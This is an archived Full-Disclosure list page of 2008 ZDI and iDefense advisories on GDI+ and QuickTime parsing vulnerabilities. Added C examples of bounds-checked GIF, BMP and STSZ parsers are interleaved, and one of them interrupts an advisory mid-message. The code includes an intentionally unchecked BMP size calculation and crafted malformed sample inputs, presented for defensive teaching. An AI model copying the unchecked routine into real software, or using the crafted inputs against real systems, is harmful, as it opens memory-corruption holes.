The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-request at lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation & Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (e.g. spamming, misappropriation) offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. 
Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure at lists.grok.org.uk. Do not send subscription/unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a consensus has been reached. From zdi-disclosures at 3com.com Tue Sep 9 20:41:36 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 14:41:36 -0500 Subject: [Full-disclosure] ZDI-08-056: Microsoft Windows GDI+ GIF Parsing Code Execution Vulnerability Message-ID: <OFFEF132A5.28D4E1B4-ON882574BF.006BE960-862574BF.006C2E07@3com.com> ZDI-08-056: Microsoft Windows GDI+ GIF Parsing Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-056 September 9, 2008 -- CVE ID: CVE-2008-3013 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows Server 2008 Microsoft Windows XP Microsoft Windows Vista Microsoft Windows Server 2003 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6358. 
For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows XP, Server and Vista. User interaction is required in that a user must open a malicious image file or browse to a malicious website. The specific flaws exist in the GDI+ subsystem when parsing maliciously crafted GIF files. By supplying a malformed graphic control extension an attacker can trigger an exploitable memory corruption condition. Successful exploitation can result in arbitrary code execution under the credentials of the currently logged in user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS08-052.mspx -- Disclosure Timeline: 2008-02-07 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Ivan Fratric -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. 
Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Tue Sep 9 20:41:29 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 9 Sep 2008 14:41:29 -0500 Subject: [Full-disclosure] ZDI-08-055: Microsoft Windows GDI+ BMP Parsing Code Execution Vulnerability Message-ID: <OF43F6E0AD.B75ACC26-ON882574BF.006BE869-862574BF.006C2B2D@3com.com> ZDI-08-055: Microsoft Windows GDI+ BMP Parsing Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-055 September 9, 2008 -- CVE ID: CVE-2008-3015 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows XP Microsoft Windows Server 2008 Microsoft Windows Vista Microsoft Windows Server 2003 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6375. 
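ZDI-08-056 above says only that a malformed graphic control extension makes GDI+ corrupt memory; the defective GDI+ code itself is not published. The C program below is an added example written for this page (not Microsoft's, ZDI's or the advisory's code) that shows the bug class in a defensive form: a walker over the GIF block structure that refuses a Graphic Control Extension whose block-size byte is not the 4 the GIF89a specification fixes, and that bounds-checks every other length field (colour tables, data sub-block chains) before advancing. It goes a little beyond the advisory by also handling image descriptors and the other extension types. The three sample streams are constructed for this example and are not the files from the original report; the function and error names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

enum {
    GIF_OK            =  0,
    GIF_ERR_HEADER    = -1,  /* not a GIF87a/GIF89a stream */
    GIF_ERR_TRUNCATED = -2,  /* a length field points past the end of the buffer */
    GIF_ERR_GCE_SIZE  = -3,  /* Graphic Control Extension block size is not 4 */
    GIF_ERR_BLOCK     = -4   /* unknown block introducer or missing terminator */
};

/* Decoded Graphic Control Extension (GIF89a specification, section 23). */
typedef struct {
    uint8_t  packed;             /* disposal method, user-input and transparency flags */
    uint16_t delay_cs;           /* frame delay in 1/100 s */
    uint8_t  transparent_index;  /* palette index treated as transparent */
} gif_gce;

/* Skip a chain of data sub-blocks (<size><size bytes>..., ended by 0x00).
   Every advance is checked against len before a byte is read. */
static int skip_subblocks(const uint8_t *buf, size_t len, size_t *pos)
{
    for (;;) {
        if (*pos >= len) return GIF_ERR_TRUNCATED;
        uint8_t size = buf[(*pos)++];
        if (size == 0) return GIF_OK;
        if (size > len - *pos) return GIF_ERR_TRUNCATED;
        *pos += size;
    }
}

/* Walk the block structure of a GIF stream, decoding the last GCE seen.
   Returns GIF_OK at the trailer (0x3B) or a negative error code. */
int gif_walk(const uint8_t *buf, size_t len, gif_gce *gce)
{
    size_t pos = 13;                              /* signature + logical screen descriptor */
    memset(gce, 0, sizeof *gce);
    if (len < 13 || memcmp(buf, "GIF8", 4) != 0) return GIF_ERR_HEADER;
    if (buf[10] & 0x80) {                         /* global colour table present */
        size_t gct = 3u << ((buf[10] & 7) + 1);
        if (gct > len - pos) return GIF_ERR_TRUNCATED;
        pos += gct;
    }
    for (;;) {
        if (pos >= len) return GIF_ERR_TRUNCATED;
        uint8_t introducer = buf[pos++];
        if (introducer == 0x3B) return GIF_OK;    /* trailer */
        if (introducer == 0x21) {                 /* extension: label + sub-blocks */
            if (len - pos < 2) return GIF_ERR_TRUNCATED;
            uint8_t label = buf[pos++];
            if (label != 0xF9) {                  /* comment, plain text, application */
                int rc = skip_subblocks(buf, len, &pos);
                if (rc != GIF_OK) return rc;
                continue;
            }
            uint8_t block_size = buf[pos++];
            /* A parser that trusts block_size and copies that many bytes into a fixed
               4-byte structure is the bug class at issue. The spec fixes the size at 4,
               so anything else is rejected rather than copied. */
            if (block_size != 4) return GIF_ERR_GCE_SIZE;
            if (len - pos < 5) return GIF_ERR_TRUNCATED;  /* 4 data bytes + terminator */
            gce->packed            = buf[pos];
            gce->delay_cs          = (uint16_t)(buf[pos + 1] | (buf[pos + 2] << 8));
            gce->transparent_index = buf[pos + 3];
            pos += 4;
            if (buf[pos++] != 0x00) return GIF_ERR_BLOCK;
        } else if (introducer == 0x2C) {          /* image descriptor */
            if (len - pos < 9) return GIF_ERR_TRUNCATED;
            uint8_t img_packed = buf[pos + 8];
            pos += 9;
            if (img_packed & 0x80) {              /* local colour table */
                size_t lct = 3u << ((img_packed & 7) + 1);
                if (lct > len - pos) return GIF_ERR_TRUNCATED;
                pos += lct;
            }
            if (pos >= len) return GIF_ERR_TRUNCATED;
            pos++;                                /* LZW minimum code size */
            int rc = skip_subblocks(buf, len, &pos);
            if (rc != GIF_OK) return rc;
        } else {
            return GIF_ERR_BLOCK;
        }
    }
}

/* Constructed samples (not real-world files). Header = "GIF89a", 1x1, no colour table. */
#define GIF_HDR 'G','I','F','8','9','a', 0x01,0x00, 0x01,0x00, 0x00,0x00,0x00
static const uint8_t sample_gif[] = {            /* GCE (delay 10) + 1x1 image + trailer */
    GIF_HDR, 0x21,0xF9,0x04, 0x01, 0x0A,0x00, 0x00, 0x00,
    0x2C, 0x00,0x00, 0x00,0x00, 0x01,0x00, 0x01,0x00, 0x00, 0x02, 0x02,0x44,0x01, 0x00, 0x3B };
static const uint8_t sample_gif_bad_gce[] = {    /* GCE block size byte overwritten with 0xFF */
    GIF_HDR, 0x21,0xF9,0xFF, 0x01, 0x0A,0x00, 0x00, 0x00, 0x3B };
static const uint8_t sample_gif_truncated[] = {  /* comment sub-block claims 16 bytes, has 2 */
    GIF_HDR, 0x21,0xFE,0x10, 'h','i' };

/* Wrapper for checking: the GCE delay on success, or the negative error code. */
int gif_gce_delay(const uint8_t *buf, size_t len)
{
    gif_gce g;
    int rc = gif_walk(buf, len, &g);
    return rc == GIF_OK ? (int)g.delay_cs : rc;
}

int main(void)
{
    printf("valid %d, bad size %d, truncated %d\n",
           gif_gce_delay(sample_gif, sizeof sample_gif),
           gif_gce_delay(sample_gif_bad_gce, sizeof sample_gif_bad_gce),
           gif_gce_delay(sample_gif_truncated, sizeof sample_gif_truncated));
    return 0;
}
```

The point of the shape is that every read is preceded by a comparison against the remaining length, and the one field whose size the format fixes is compared against that constant rather than used as a copy length. A fuzzing harness for any image parser should include exactly these three mutations: a fixed-size block with its size byte altered, a sub-block chain that runs off the end, and a colour table larger than the remaining file.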
For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows XP, Server and Vista. User interaction is required in that a user must open a malicious image file.

The specific flaws exist in the GDI+ subsystem when parsing maliciously crafted BMP files. Supplying a malformed BitMapInfoHeader can result in incorrect integer calculations further leading to an exploitable memory corruption. Successful exploitation can result in arbitrary code execution under the credentials of the currently logged in user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
http://www.microsoft.com/technet/security/bulletin/MS08-052.mspx

-- Disclosure Timeline:
2007-07-20 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
From zdi-disclosures at 3com.com Tue Sep 9 22:58:19 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 9 Sep 2008 16:58:19 -0500
Subject: [Full-disclosure] ZDI-08-060: Apple QuickTime AVC1 Atom Parsing Heap Overflow Vulnerability
Message-ID: <OFF59ED1E8.2C1D86DC-ON882574BF.00782104-862574BF.0078B237@3com.com>

ZDI-08-060: Apple QuickTime AVC1 Atom Parsing Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-060
September 9, 2008

-- CVE ID:
CVE-2008-3627

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6169.

For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists in the parsing of AVC1 atoms. An integer overflow condition is present that can result in a heap chunk being under-allocated. This heap corruption can be further leveraged to execute arbitrary code under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-05-15 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
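The BMP advisory (ZDI-08-055) and the AVC1 advisory (ZDI-08-060) both describe size arithmetic that wraps and leaves a heap buffer smaller than the data later written into it. As an added example that is not code from ZDI, Microsoft or Apple, here is a BITMAPINFOHEADER pixel-array sizing routine in its naive 32-bit form beside an overflow-checked one; the bmp_dims struct and the MAX_PIXEL_BYTES cap are assumptions of this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Policy cap on one pixel buffer; a constructed limit for this example. */
#define MAX_PIXEL_BYTES ((size_t)256 * 1024 * 1024)

/* Portable overflow-checked arithmetic on size_t. */
static bool checked_mul(size_t a, size_t b, size_t *out)
{
    if (a != 0 && b > SIZE_MAX / a)
        return false;
    *out = a * b;
    return true;
}

static bool checked_add(size_t a, size_t b, size_t *out)
{
    if (b > SIZE_MAX - a)
        return false;
    *out = a + b;
    return true;
}

/* The BITMAPINFOHEADER fields that drive pixel-array sizing (hypothetical
 * struct for this example). biHeight is signed: negative means top-down. */
typedef struct {
    int32_t  biWidth;
    int32_t  biHeight;
    uint16_t biBitCount;
} bmp_dims;

/* Naive sizing in plain 32-bit arithmetic. A crafted header makes
 * stride * height wrap, so the caller allocates far fewer bytes than the
 * decoder later writes: the under-allocation pattern the BMP and AVC1
 * advisories describe. Unsigned casts keep the wrap defined for the demo. */
uint32_t bmp_pixel_bytes_unchecked(const bmp_dims *d)
{
    uint32_t width  = (uint32_t)d->biWidth;
    uint32_t height = d->biHeight < 0 ? 0u - (uint32_t)d->biHeight
                                      : (uint32_t)d->biHeight;
    uint32_t stride = ((width * d->biBitCount + 31) / 32) * 4; /* rows are 4-byte aligned */
    return stride * height;                                    /* may wrap to a tiny value */
}

/* Hardened sizing: rejects non-positive width, zero or INT32_MIN height,
 * unsupported depths, any intermediate overflow, and sizes above the cap.
 * On success writes the byte count and returns true. */
bool bmp_pixel_bytes_checked(const bmp_dims *d, size_t *out)
{
    if (d->biWidth <= 0 || d->biHeight == 0 || d->biHeight == INT32_MIN)
        return false;
    switch (d->biBitCount) {
    case 1: case 4: case 8: case 16: case 24: case 32:
        break;
    default:
        return false;                      /* depth the decoder does not support */
    }
    size_t width  = (size_t)d->biWidth;
    size_t height = (size_t)(d->biHeight < 0 ? -d->biHeight : d->biHeight);
    size_t bits, stride, total;
    if (!checked_mul(width, d->biBitCount, &bits)) return false;
    if (!checked_add(bits, 31, &bits))              return false;
    stride = (bits / 32) * 4;
    if (!checked_mul(stride, height, &total))       return false;
    if (total > MAX_PIXEL_BYTES)                     return false;  /* refuse absurd images */
    *out = total;
    return true;
}

int main(void)
{
    /* Constructed headers: a normal 640x480 24-bit image, and a crafted one
     * whose true pixel-array size is 2^34 bytes, which wraps to 0 in 32 bits. */
    bmp_dims normal  = { 640, 480, 24 };
    bmp_dims crafted = { 65536, 65536, 32 };
    size_t n = 0;
    printf("normal   unchecked=%u checked=%s\n", (unsigned)bmp_pixel_bytes_unchecked(&normal),
           bmp_pixel_bytes_checked(&normal, &n) ? "accept" : "reject");
    printf("crafted  unchecked=%u checked=%s\n", (unsigned)bmp_pixel_bytes_unchecked(&crafted),
           bmp_pixel_bytes_checked(&crafted, &n) ? "accept" : "reject");
    return 0;
}
```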
From zdi-disclosures at 3com.com Tue Sep 9 22:56:49 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 9 Sep 2008 16:56:49 -0500
Subject: [Full-disclosure] ZDI-08-058: Apple QuickTime Panorama PDAT Atom Parsing Buffer Overflow Vulnerability
Message-ID: <OF82B48569.15399D7C-ON882574BF.00782211-862574BF.00788F54@3com.com>

ZDI-08-058: Apple QuickTime Panorama PDAT Atom Parsing Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-058
September 9, 2008

-- CVE ID:
CVE-2008-3625

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6242.

For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists in the handling of panorama track PDAT atoms.
When the maxTilt, minFieldOfView and maxFieldOfView elements are corrupted, a stack buffer overflow occurs which can be further leveraged to execute arbitrary code under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-06-25 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
From zdi-disclosures at 3com.com Tue Sep 9 22:59:52 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 9 Sep 2008 16:59:52 -0500
Subject: [Full-disclosure] ZDI-08-062: Apple QuickTime MDAT Frame Parsing Memory Corruption Vulnerability
Message-ID: <OFC2D01104.B63ECC2D-ON882574BF.00781CF0-862574BF.0078D6B4@3com.com>

ZDI-08-062: Apple QuickTime MDAT Frame Parsing Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-062
September 9, 2008

-- CVE ID:
CVE-2008-3627

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists in the parsing of mov video files in QuickTimeH264.scalar. A maliciously crafted MDAT atom can cause a heap corruption resulting in the execution of arbitrary code under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-05-19 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Subreption LLC
From zdi-disclosures at 3com.com Tue Sep 9 22:56:07 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 9 Sep 2008 16:56:07 -0500
Subject: [Full-disclosure] ZDI-08-057: Apple QuickTime IV32 Codec Parsing Stack Overflow Vulnerability
Message-ID: <OF1E914E95.7EA452D1-ON882574BF.00782298-862574BF.00787EAA@3com.com>

ZDI-08-057: Apple QuickTime IV32 Codec Parsing Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-057
September 9, 2008

-- CVE ID:
CVE-2008-3635

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the parsing of QuickTime files that utilize the Indeo video codec. A lack of proper bounds checking within QuickTimeInternetExtras.qtx can result in a stack based buffer overflow leading to arbitrary code execution under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-08-19 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
From zdi-disclosures at 3com.com Tue Sep 9 22:59:17 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 9 Sep 2008 16:59:17 -0500
Subject: [Full-disclosure] ZDI-08-061: Apple QuickTime Player H.264 Parsing Heap Corruption Vulnerability
Message-ID: <OFF44078F7.DFCE0D2D-ON882574BF.00782062-862574BF.0078C8D3@3com.com>

ZDI-08-061: Apple QuickTime Player H.264 Parsing Heap Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-061
September 9, 2008

-- CVE ID:
CVE-2008-3627

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists in the parsing of MP4 video files in QuickTimeH264.qtx. A maliciously crafted MDAT atom can cause a heap corruption resulting in the execution of arbitrary code.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-05-13 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
From zdi-disclosures at 3com.com Tue Sep 9 22:57:34 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 9 Sep 2008 16:57:34 -0500
Subject: [Full-disclosure] ZDI-08-059: Apple QuickTime STSZ Atom Parsing Heap Corruption Vulnerability
Message-ID: <OF5E205B69.A7D117EE-ON882574BF.0078218D-862574BF.0078A0A7@3com.com>

ZDI-08-059: Apple QuickTime STSZ Atom Parsing Heap Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-059
September 9, 2008

-- CVE ID:
CVE-2008-3626

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6148.
For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists in the handling of STSZ atoms within the function CallComponentFunctionWithStorage(). When an entry in the sample_size_table is too large, a memory corruption occurs which can be further leveraged to execute arbitrary code under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-05-15 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
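The STSZ advisory (ZDI-08-059) turns on a sample_size_table entry larger than the data the file actually holds. As an added example that is not Apple's code, here is a validating parser for the 'stsz' atom that checks the declared atom size against the buffer, the entry count against the atom, and every entry and their running sum against media_bytes, a caller-measured count of media bytes present that this example assumes; the sample atoms are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Validated view of an 'stsz' atom. If sample_size != 0 all samples share that
 * size and entries is NULL; otherwise entries points at sample_count big-endian
 * 32-bit sizes inside the caller's buffer. */
typedef struct {
    uint32_t       sample_size;
    uint32_t       sample_count;
    const uint8_t *entries;
    uint64_t       total_bytes;   /* sum of every sample size */
} stsz_info;

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Parse and validate the stsz atom in [buf, buf+len). media_bytes is how many
 * bytes of media data are actually present (assumed measured by the caller);
 * every sample size is bounded by it. Returns false on any inconsistency. */
bool parse_stsz(const uint8_t *buf, size_t len, uint64_t media_bytes, stsz_info *out)
{
    const size_t header = 8 + 4 + 4 + 4;   /* size+type, version+flags, sample_size, sample_count */
    if (len < header)
        return false;
    uint32_t atom_size = be32(buf);
    if (memcmp(buf + 4, "stsz", 4) != 0 || buf[8] != 0)   /* type tag and version 0 only */
        return false;
    if (atom_size < header || atom_size > len)             /* declared size must fit what we hold */
        return false;
    uint32_t sample_size  = be32(buf + 12);
    uint32_t sample_count = be32(buf + 16);
    uint64_t total;

    if (sample_size != 0) {
        if (atom_size != header)                            /* fixed-size samples carry no table */
            return false;
        total = (uint64_t)sample_size * sample_count;      /* 32x32-bit product fits in 64 bits */
        if (total > media_bytes)
            return false;
        out->entries = NULL;
    } else {
        /* Done in 64 bits: in 32-bit arithmetic a count of 0x40000000 * 4 wraps
         * to 0, so a naive "table fits" test passes on a 20-byte atom and the
         * decoder then walks 2^30 entries that do not exist. */
        if ((uint64_t)sample_count * 4 != (uint64_t)atom_size - header)
            return false;
        const uint8_t *tbl = buf + header;
        total = 0;
        for (uint32_t i = 0; i < sample_count; i++) {
            uint32_t sz = be32(tbl + (size_t)i * 4);
            if (sz > media_bytes)                           /* the over-large entry the advisory names */
                return false;
            total += sz;                                    /* cannot run away: we bail past media_bytes */
            if (total > media_bytes)
                return false;
        }
        out->entries = tbl;
    }
    out->sample_size  = sample_size;
    out->sample_count = sample_count;
    out->total_bytes  = total;
    return true;
}

/* Constructed atoms for the demo: three entries of 256, 512 and 128 bytes; the
 * same table with a 0xFFFFFFF0-byte entry; a 20-byte atom claiming 0x40000000
 * entries; and a fixed-size atom of 1000 samples of 4096 bytes. */
static const uint8_t kGoodAtom[32] = {
    0,0,0,32, 's','t','s','z', 0,0,0,0, 0,0,0,0, 0,0,0,3,
    0,0,1,0, 0,0,2,0, 0,0,0,0x80 };
static const uint8_t kBadEntryAtom[32] = {
    0,0,0,32, 's','t','s','z', 0,0,0,0, 0,0,0,0, 0,0,0,3,
    0,0,1,0, 0,0,2,0, 0xFF,0xFF,0xFF,0xF0 };
static const uint8_t kBadCountAtom[20] = {
    0,0,0,20, 's','t','s','z', 0,0,0,0, 0,0,0,0, 0x40,0,0,0 };
static const uint8_t kFixedAtom[20] = {
    0,0,0,20, 's','t','s','z', 0,0,0,0, 0,0,0x10,0, 0,0,0x03,0xE8 };

int main(void)
{
    stsz_info info;
    const uint64_t media_bytes = 1024;   /* constructed: 1 KiB of mdat payload */
    printf("good:      %s\n", parse_stsz(kGoodAtom, sizeof kGoodAtom, media_bytes, &info) ? "accept" : "reject");
    printf("bad entry: %s\n", parse_stsz(kBadEntryAtom, sizeof kBadEntryAtom, media_bytes, &info) ? "accept" : "reject");
    printf("bad count: %s\n", parse_stsz(kBadCountAtom, sizeof kBadCountAtom, media_bytes, &info) ? "accept" : "reject");
    printf("fixed:     %s\n", parse_stsz(kFixedAtom, sizeof kFixedAtom, media_bytes, &info) ? "accept" : "reject");
    return 0;
}
```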
From labs-no-reply at idefense.com Wed Sep 10 01:38:46 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Tue, 09 Sep 2008 19:38:46 -0500
Subject: [Full-disclosure] iDefense Security Advisory 09.09.08: Apple QuickTime PICT Integer Overflow Vulnerability
Message-ID: <48C71716.9040407@idefense.com>

iDefense Security Advisory 09.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Sep 09, 2008

I. BACKGROUND

Quicktime is Apple's media player product, and is used to render video and other media. The PICT file format was developed by Apple Inc. in 1984. PICT files can contain both object oriented images and bitmaps. For more information visit the vendor's web site at the following URL.

http://www.apple.com/quicktime/

II. DESCRIPTION

Remote exploitation of an integer overflow in Apple Inc.'s QuickTime could allow an attacker to execute arbitrary code in the security context of the current user.

QuickTime is vulnerable to an integer overflow vulnerability when handling malformed PICT files.
This issue results in heap corruption which can lead to arbitrary code execution.

III. ANALYSIS

Exploitation of this issue results in arbitrary code execution in the security context of the current user. An attacker would need to host a web page containing a malformed PICT file. Upon visiting the malicious web page exploitation would occur. Alternatively a malicious PICT file could be attached to an e-mail.

IV. DETECTION

Apple Inc.'s QuickTime versions 7.4.5 and 7.4 have been confirmed to be vulnerable to this issue. Older versions are also suspected to be vulnerable.

V. WORKAROUND

iDefense recommends disabling the QuickTime Plug-in and altering the .pic and .pict file type associations within the registry. Disabling the plug-in will prevent web browsers from utilizing QuickTime Player to view associated media files. Removing the file type associations within the registry will prevent QuickTime Player and Picture Viewer from opening .pic and .pict files.

VI. VENDOR RESPONSE

Apple has released QuickTime 7.5.5 which resolves this issue. More information is available via Apple's QuickTime Security Update page at the URL shown below.

http://support.apple.com/kb/HT3027

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3614 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

05/13/2008  Initial vendor notification
05/22/2008  Initial vendor response
09/09/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From labs-no-reply at idefense.com Wed Sep 10 01:27:32 2008
From: labs-no-reply at idefense.com (iDefense Labs)
